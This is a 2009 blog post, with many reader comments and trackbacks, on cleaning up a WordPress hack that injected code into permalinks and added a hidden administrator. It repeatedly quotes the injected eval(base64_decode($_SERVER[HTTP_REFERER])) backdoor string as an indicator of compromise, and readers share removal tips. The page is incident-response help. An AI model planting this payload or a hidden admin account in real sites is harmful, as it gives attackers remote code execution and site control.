Wordpress Permalink & Rss problems
Tags: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/, /%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%, error on line 22 at column 71: xmlParseEntityRef: no name wordpress, wordpress
If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.
To fix things:
- go to Setting->Permalinks and delete the above mean code
- go to users, you will notice there are more administrators than usual
Put your mouse over the users and find the one that is last to register like this
Right click and copy the edit url, then paste it into the address bar. Also increase the number by 1.
You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber then return to users and delete him.
Check the source of the page with administrators just in case, even if you don’t see something odd. On some older version the hack hides the increased number of admins too. If that doesn’t work right click somehwere on the background and select ‘View Source’ then use search terms like ‘administrator’ or ‘user_’ to find out the id of the hidden admin. Then copy the edit url and replace the id, make him a subscriber and delete it like I explained above.
This should fix it. Don’t forget to upgrade your blog to the latest version.
*This was written in a rush to help you so please forgive the errors. 
You will like:
- 4 Free Websites to help you Generate a Holiday Checklist
- 25000 Hilton Honors points with 4 stays now through the end of the year
- Tripwolf – Revolutionizing Travel
- Win Free FON Routers @ Tripwolf
- Archos Announced 10s and 13 Ultra Portable Notebook
Subscribe...
To my feed via RSS 
. (?) or via email.
if not, come back tomorrow on journeyetc.com and see what's new :)
Possible search terms
The second clue is that a “back door” was created by a “hidden” Administ
- <p>The second clue is that a “back door” was created by a “hidden” Administ
- exploit wordpress base64_decode($_SERVER[HTTP_REFERER])
- hidden admin wordpress
wordpress permalink missing
wordpress permalink hack
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}| )&%/
- wordpress feed permalink
- wordpress permalinks rss
- rss problem wordpress
- intext:eval(base64_decode($_SERVER[HTTP_REFERER]))
wordpress hidden administrator
- wordpress permalink problem
- wordpress administrator (2)
- wordpress remove hidden administrator
wordpress permalink exploit
wordpress hidden user
- wordpress permalinks broken
- reset permalinks
wordpress rss
- wordpress eval base64_decode permalink
- wordpress reset permalinks
- wordpress permalinks exploit
- wordpress rss permalink
wordpress rss problem
com/category/post-title/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}| )&%/</code> The keywords are “eval” and “base64_decode ” </p> <p>The second clue is that a “back door” was created by a “hidden” Administ
wordpress permalink
September 4th, 2009 at 2:08 pm
Thanks for this quick writeup, there seems to have been an outbreak of this over the past few days. My blog (running v2.6.3) was compromised too.
I would also recommend upgrading to the latest Wordpress version immediately after fixing the issue, although it hasn’t been verified that 2.8.4 is not vulnerable, as far as I know.
I am hoping the Wordpress guys will make some sort of an official announcement about this, because the problem seems to be really widespread.
September 4th, 2009 at 2:09 pm
[...] the end of url links breaking them Check to if you have new admins added to your Wordpress too. Wordpress Permalink & Rss problems seems to have the latest update info, hope it [...]
September 4th, 2009 at 2:17 pm
[...] [...]
September 4th, 2009 at 4:20 pm
This works perfect.. except i found the secret admin profile by adding 1 to my total amount of users.. like if u have 10234 users signed up.. use 10235…. thanks alot
September 4th, 2009 at 4:27 pm
Hey – thanks for this well written post!!
September 4th, 2009 at 4:34 pm
Thank you for the fix! When I saw that our site had been hacked I thought I was going to have to spend the rest of the day trying to fix it but your instructions were right on the money and I had the site back up and running within a few minutes. THANK YOU!
-tory
September 4th, 2009 at 5:10 pm
Cleared out the permalink but I can’t find the missing user! Please help!
September 4th, 2009 at 7:28 pm
from SSH :
grep -H -r “var setUserName = function” /var/lib/mysql
…
after this use phpMyAdmin and search string in infected database (result from grep) … browse result
1. remember all “user_id” value from wp_usermeta table where meta_key = “first_name”
2. from wp_users table remove all rows (users) with ID = user_id
3. remove row from wp_usermeta table where meta_key = “first_name”.
—
set again permalinks from wordpress admin (with real one)
—
clear all files from wordpress cache, etc…
September 4th, 2009 at 7:31 pm
Yes – thanks for having this here. Easy fix. Do we know for sure that there are no lingering repurcussions? Some sort of trojan that was put into the blog or backend that will unveil itself down the road despite these fixes, and despite upgraded to 2.8.4?
September 4th, 2009 at 7:31 pm
Thanks so much for the help. It was an easy fix and understandable.
September 4th, 2009 at 8:15 pm
@aw – I’ve not heard of any more issues so far. I will update if there will be.
@Jeffrey – Look at the picture. Search the user with the highest number and increase it with 1.
@Byrev – ms
September 4th, 2009 at 8:22 pm
THANKS very much for this posting. I have published another method of finding and removing the hidden user, and it doesn’t require SSH access to your web server. More details are in my blog at:
http://blog.nachotech.com/?p=125
Cheers,
Iggy
September 4th, 2009 at 10:33 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 4th, 2009 at 10:48 pm
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ Notas:d+ [?] [?] ¿Te gustó este post? [...]
September 4th, 2009 at 11:21 pm
[...] Today I found my permalinks were all screwed up, and guess what I found another admin popped up from who knows where. Was easy enough to fix once I found this article, http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/. [...]
September 4th, 2009 at 11:22 pm
Looks like no admin users are added to Wordpress 2.7, although the permalinks are still broken. Can anyone else confirm?
September 5th, 2009 at 2:54 am
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ [...]
September 5th, 2009 at 3:04 am
I had this hack happen to me today with this string:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was NO additional admin added.
WP 2.82.
What is interesting is that the hacker somehow disabled the tools–>upgrade code. It normally tells you you have 2.82 and need to upgrade to 2.84. The bottom of the screen showed the need to upgrade, but the code at under the upgrade tool said it was at latest version with no upgrade needed!
September 5th, 2009 at 4:33 am
Thank you very much for writing this post — I have used it to resolve this issue on a student blog. I wouldn’t have figured it out as quickly without your help!
September 5th, 2009 at 5:55 am
[...] yang tidak kita kenal. Sangat mungkin sekali kita tidak bisa mengakses akun siluman ini. Baca di Journey Etc untuk mengetahui [...]
September 5th, 2009 at 6:19 am
Awesome and helpful. I used this simple system to delete the rogue admin and restore normalcy to my blog. Thank you very much!
All success
Dr.Mani
September 5th, 2009 at 8:23 am
[...] Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 8:40 am
[...] 0 Hey WordPress liefhebber! Wil je op de hoogte blijven van nieuwe blogposts, blijf dan bij via onze RSS feed of Twitter profiel.Op dit moment worden worden er heel veel oude WordPress installaties aangevallen door kwaadwillenden. Otto, een key developer van WordPress kwam met deze melding. Er zijn twee manieren om er achter te komen of je WordPress installatie getroffen is: There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 10:23 am
Thanks, this helped a lot…..
September 5th, 2009 at 10:31 am
Thank you so much for this, getting rid of the blighter was doing my head in. It has taught me a valuable lesson in keeping secure.
If you are having trouble locating the user ID, I found the hidden administrator by opening up the HTML brower source in notepad and checking through users that way. It says exactly what user ID the hacker administrator is.
Thanks
September 5th, 2009 at 10:35 am
[...] more here and there will no doubt be plenty coming on WordPress itself and further advice appearing online as [...]
September 5th, 2009 at 12:54 pm
[...] For at rette problemet kan du efter sigende gøre følgende (jeg har ikke selv haft problemet og har derfor ikke testet forklaringen, der er hentet hos JourneyEtc.com : [...]
September 5th, 2009 at 1:20 pm
[...] This post offers some solutions if you have already been hacked. Remove the extra permalink code in Settings → Permalinks, remove the extra admin account, and (obviously) upgrade to the latest version of WordPress. [...]
September 5th, 2009 at 1:47 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 1:52 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 2:07 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 2:14 pm
Thanks so much! None of the permalinks in my 3 WP installations were affected, but I found a hidden Administrator in my travel log. Using the tips from here: http://blog.nachotech.com/?p=125, I found its userid via pagesource and then deleted it – only to have another one pop up, and then another one (I could actually see them appear when I clicked refresh). After that I finally managed to upgrade, and now it seems fine… *crosses fingers*
September 5th, 2009 at 2:53 pm
@Admin any time
have a nice blogging !
September 5th, 2009 at 3:44 pm
[...] (2)” eller ett namn som du inte känner igen. Du kommer antagligen inte åt kontot, men Journey Etc har en möjlig [...]
September 5th, 2009 at 4:46 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 5:02 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 5:39 pm
[...] If you can no longer log in, check out this possible solution. [...]
September 5th, 2009 at 6:37 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 7:12 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 7:17 pm
Thank you for this posting.
I translated the solution into Japanese and posted it at http://sakuratan.biz/archives/1204. (Please contact me if you don’t want to permit me the translation.)
Thanks!
September 5th, 2009 at 7:49 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 5th, 2009 at 10:02 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.” [...]
September 5th, 2009 at 10:51 pm
[...] WordPress Permalink and RSS Problems [...]
September 6th, 2009 at 12:10 am
[...] http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/ [...]
September 6th, 2009 at 12:18 am
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.” [...]
September 6th, 2009 at 1:58 am
The secret user’s first name is a javascript function. I won’t reproduce it here but… injection attack? After all this time? Is that the vulnerability or did the hack happen some other way?
September 6th, 2009 at 2:05 am
Thanks so much for posting this! I only have one admin (me), so I did a “view source” and searched for “administrator” and found the hidden name. In case that helps anyone.
Thanks again!
September 6th, 2009 at 2:25 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 6th, 2009 at 6:20 pm
[...] info: Old WordPress Versions Under Attack Wordpress Permalink & Rss problems How to Keep WordPress Secure This entry was written by Verdi, posted on September 6, 2009 at 1:19 [...]
September 6th, 2009 at 7:48 pm
[...] You will notice the hack as it leaves a bunch of code in the permalinks. You can read more about it here as well as a solution. Journeyetc.com. [...]
September 7th, 2009 at 5:06 pm
To find the hidden admin you may need to set the user_ID field to +2 instead of +1. This was require in my case.
If you’re handy with phpadmin you can browse the wp_users table and look at the last record to fetch the user_ID.
September 7th, 2009 at 5:56 pm
I’ve had the same hack with the permalink problem, and that was an easy fix. I also now have a hidden administrator and have found the user ID in the source code. I must be braindead right now though, I am not understanding your guide on how to get rid of this user (overcomplicating and overlooking the simple and obvious most likely) . You said “paste into address bar”, are you referring to the browser nav bar? That gets me no where, and the only other place I can see to paste is into the search bar on the admin user page and that isn’t getting me anywhere either.
September 7th, 2009 at 6:15 pm
Please disregard my last comment, I answered my own question. After rethinking what I was doing, I was just overcomplicating my thought process. Went back had another look and the answer was right in front of me. Hidden user and malicious java script are now gone.
September 7th, 2009 at 9:16 pm
[...] found another great article from Journey etc explaining a different way to find a hidden [...]
September 7th, 2009 at 11:12 pm
Scooter, same problem. how did you go about searching?
September 7th, 2009 at 11:20 pm
Ok, got it. Just pasted it after the url of WP admin. Btw, the hidden admi name is monroeescobar72. Any similarities with others?
September 7th, 2009 at 11:23 pm
Had to delete about 10 legitimate users in a failed trial and error, too.
September 8th, 2009 at 1:28 am
[...] panel and see there is number greater than the admins you have authorized. The article at this link Click Here was helpful to me confirming the problem but I could not duplicate the fix the author was [...]
September 8th, 2009 at 5:42 am
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 8th, 2009 at 11:12 am
Unable to locate the hidden admin.
I upgraded my blog two days back . But my blog ( wp ver 2.8.4) was attacked today. I fixed the permalink, as per your instructions and it seems the issue is resolved or is there any other method to find the hidden user?
Thanks a ton for this post.
September 8th, 2009 at 12:47 pm
One seemingly reliable I was able to find the rogue account(s) was by querying the database. I don’t expect everyone to have access to their database, but querying ‘wp_users’ for any user who does not have an email address for us brought up the rogue admin account.
September 8th, 2009 at 4:30 pm
I have updated my instructions on finding and removing the hidden user(s). Perhaps some of you will find it helpful:
http://blog.nachotech.com/?p=125
September 8th, 2009 at 6:18 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 9th, 2009 at 10:41 pm
Thank you, this was tremendously helpful.
September 10th, 2009 at 12:26 am
[...] quick fix was to edit my permalink settings, removing the funky [...]
September 10th, 2009 at 2:22 pm
[...] journeyetc.com responded and describe the attack: [...]
September 11th, 2009 at 10:12 am
[...] and here [...]
September 11th, 2009 at 11:05 am
[...] If you’ve already been cyber-robbed, the instructions I used to fix Foodie Fights were on Journey Etc. The comments were helpful [...]
September 11th, 2009 at 5:30 pm
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
September 12th, 2009 at 4:25 pm
I followed your instructions and I reset the permalinks. So am I clean ? I asked the question on the wordpress forum and they suggested your fix was not enough and that I needed to completely reload all the files including plug ins with new, clean versions. That seems a lot of work to me if I don need to.
September 12th, 2009 at 4:27 pm
I deleted the rogue “administrator” by going through the database and looking up wp_users. The last one had no email address, and searching for the user name in WordPress Users section came up empty, so that had to be the hidden one.
September 15th, 2009 at 12:19 am
[...] http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/ [...]
September 15th, 2009 at 6:02 pm
YOU SAVED MY BLOG.
I love you.
Thank you.
September 15th, 2009 at 6:42 pm
I did not see any new Administrator’s, but I tried your trick of adding 1 and did not get a “rogue” administrator. Through PHPMyAdmin I went Into my Database and did not see any new users in wp_users or wp_usermeta. Has anyone heard of this permalink hack, not adding a “rogue” administrator? I’m worried I’ve missed something but tried everything I can think of.
September 17th, 2009 at 1:44 am
[...] This post offers some solutions if you have already been hacked. Remove the extra permalink code in Settings ? Permalinks, remove the extra admin account, and (obviously) upgrade to the latest version of WordPress. [...]
September 22nd, 2009 at 12:42 pm
[...] WP Permalink RSS problems. [...]
September 27th, 2009 at 6:11 pm
I am trying to help a friend with an infected installation. When I go to users I see two admin, yet when I click the admin tab it changes to 1 (and it is my friend’s admin listing). When I try to view source my virus scanner detects a couple of malicious entities (for lack a better word – haha) and it won’t let me see the source. I also tried scanning down through the list of subscribers (there are lots) – on page 8 I quickly saw an administrator, but it disappeared right away and the virus scanner kicked in again.
Any thoughts?
Can I physically remove this admin entry from within pHpmyadmin?
Thanks
September 27th, 2009 at 7:16 pm
Thanks for your help.
October 2nd, 2009 at 5:37 pm
[...] Matt Mullenweg, fondatorul WordPress, ?i de-acolo pe Techcrunch, apoi la Lorelle ?i de-aici la Journeyetc, am citit ?i am trecut la treab?. C? e [...]
October 10th, 2009 at 12:31 pm
[...] More information on how to deal with this hack can be found on the weblog Journey Etc.. [...]
October 10th, 2009 at 7:18 pm
Can I physically remove this admin entry from within pHpmyadmin
October 17th, 2009 at 6:24 pm
[...] Unpatched WordPress Users Hit by Worm [...]
November 7th, 2009 at 2:14 am
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]